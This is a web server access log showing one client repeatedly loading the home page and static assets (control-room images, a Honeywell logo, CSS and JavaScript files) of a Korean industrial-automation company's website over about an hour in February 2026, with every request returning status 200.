-[16/Feb/2026:23:49:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:49:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:49:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:49:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:49:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:49:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20587] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:49:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:49:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:49:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10421] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:23:56:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20778] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10439] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:23:56:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20778] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:23:56:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:03:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10459] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:00:03:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:03:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:03:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:03:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:03:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:03:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:03:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20847] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:03:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:03:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:06:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10459] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:00:06:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:06:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:06:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:06:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:06:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:06:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:06:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:06:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:06:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:06:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:07:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10459] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:00:07:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:07:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:07:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:07:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:07:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:07:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:07:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:07:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:07:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:07:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:57:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10459] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:00:57:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:57:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:57:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:57:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:57:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:57:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:57:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:57:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:57:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:58:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10447] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:00:58:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:58:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:58:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] 